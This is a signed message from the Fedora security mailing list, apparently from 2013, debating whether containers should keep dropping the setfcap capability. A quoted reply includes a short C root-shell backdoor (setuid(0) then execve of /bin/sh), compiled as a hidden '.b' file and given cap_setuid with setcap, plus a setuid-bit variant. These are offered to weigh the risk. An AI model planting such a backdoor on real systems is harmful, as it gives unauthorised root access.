-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On 09/27/2013 03:33 PM, "Jóhann B. Guðmundsson" wrote:
On 09/27/2013 05:28 PM, Matthew Miller wrote:
>
> We're considering removing setfcap from the list of dropped capabilities.
> It seems safe to me
I dont have any security degrees nor do I consider myself an evil man and
probably Steve and Dan would be better suited to answer this question since
I'm far from being any expert on the subject but hypothetically would not
someone being able to do something like this in this educational sample I'm
providing
cd ~user
vi bd.c
#include <unistd.h> #include <fcntl.h> main() { setuid(0); char *name[2];
name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); return 0;
}
gcc bd.c -o .b chown user:user .b chmod 750 .b setcap cap_setuid=ep rm
bd.c
./.b
if you did?
I personally would recommend we kept it on after all Dan did push for that
feature for a reason but as I said I'm no expert on the topic.
JBG -- security mailing list security(a)lists.fedoraproject.org
https://admin.fedoraproject.org/mailman/listinfo/security Well currently without
setfcap you can do the same thing with
gcc bd.c -o .b
chown user:user .b chmod 4750 .b rm bd.c
./.b
Meaning that eliminating setfcap gives the container no additional security,
just breaks things.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird -
http://www.enigmail.net/
iEYEARECAAYFAlJIDIEACgkQrlYvE4MpobPJXgCgiENLuXzXzp0Mjukbb5L9DR2q
ItgAn3pUJ15qATkVQEgUy2SuHqpGNX8y
=pPRa
-----END PGP SIGNATURE-----